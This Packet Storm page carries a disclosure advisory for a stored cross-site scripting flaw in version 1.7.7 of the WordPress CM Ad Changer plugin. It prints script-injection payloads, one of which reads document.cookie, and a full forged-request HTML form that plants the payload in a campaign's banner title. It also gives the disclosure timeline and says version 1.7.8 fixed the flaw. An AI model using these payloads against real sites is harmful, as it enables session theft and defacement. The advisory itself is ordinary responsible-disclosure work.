Twenty Year Anniversary

WordPress CM Ad Changer 1.7.7 Cross Site Scripting

WordPress CM Ad Changer 1.7.7 Cross Site Scripting
Posted Jun 11, 2016
Authored by Aaditya Purani

WordPress CM Ad Changer plugin version 1.7.7 suffers from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | 80cb4eb6ea55d48f15896a8e034b5894

WordPress CM Ad Changer 1.7.7 Cross Site Scripting

Change Mirror Download
#Exploit Title: CM Ad Changer Plugin XSS
#Date: 9/6/2016
#Exploit Author: Aaditya Purani
#Author Homepage: https://aadityapurani.com
#Vendor Homepage: https://ad-changer.cminds.com
#Software Link: https://downloads.wordpress.org/plugins/cm-ad-changer.zip
(Updated)
#Version: 1.7.7
#Tested on: Wordpress 4.5.2
#Category: Web applications

Description:
An Stored Cross Site Scripting was reported by me to CM Ad Plugins under
which an Unprivileged user can Trigger a Stored XSS to perform malicious
action or any attacker could send a Crafted link which can trigger Stored
XSS

Steps to Produce:

1) Go to CM Ad changers -> Campaigns

2) Create a Campaign. Enter whatever you want in Campaign settings, in the
next tab "Campaign Banners", select an Image in Campaign images and in
Banner Title enter this payload
</script><script>confirm(/aaditya/)</script>
</script><script>confirm(document.cookie)</script>

3) Enter Save & Payload triggers everytime you Return.

Attacker Can Make a Payload File containing the following:

<html>

<body>
<h1> Click The button below. POC By Aaditya Purani:: CM AD Changer
1.7.7 </h1>
<form action="
http://127.0.0.1/wordpress/wp-admin/admin.php?page=cmac_campaigns&action=edit&campaign_id={TARGET_ID}"
method="POST">
<input type="hidden" name="campaign_id" value="1" />
<input type="hidden" name="title" value="Hacked by Aaditya" />
<input type="hidden" name="comment" value="" />
<input type="hidden" name="link" value="" />
<input type="hidden" name="status" value="on" />
<input type="hidden" name="banner_display_method" value="selected" />
<input type="hidden" name="banner_filename[]"
value="yourpicvalue.jpg" />
<input type="hidden" name="banner_title[]"
value="</script><script>confirm(/aaditya/)</script>" />
<input type="hidden" name="banner_title_tag[]" value="" />
<input type="hidden" name="banner_tag[]" value="" />
<input type="hidden" name="banner_link[]" value="" />
<input type="hidden" name="banner_weight[]" value="0" />
<input type="hidden" name="selected_banner" value="yourpicvalue.jpg"
/>
<input type="hidden" name="submit" value="Save" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

This will Trigger Stored XSS at banner_title Parameter.

It has been fixed and Version 1.7.8 Released on 9th June
Visit Here:
https://ad-changer.cminds.com/cm-ad-changer-plugin-free-edition-release-notes

---------Timeline----------

1st June : Reported to Vendor Creative Minds
3rd June: Additional Information provided
6th June: Team will able to reproduce
7th June: Fix and confirmed by me
9th June: Publically Fix released & Changelog updated 1.7.8

Regards,
Aaditya Purani

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

August 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    19 Files
  • 2
    Aug 2nd
    17 Files
  • 3
    Aug 3rd
    16 Files
  • 4
    Aug 4th
    1 Files
  • 5
    Aug 5th
    1 Files
  • 6
    Aug 6th
    19 Files
  • 7
    Aug 7th
    15 Files
  • 8
    Aug 8th
    9 Files
  • 9
    Aug 9th
    7 Files
  • 10
    Aug 10th
    10 Files
  • 11
    Aug 11th
    1 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    14 Files
  • 14
    Aug 14th
    18 Files
  • 15
    Aug 15th
    38 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close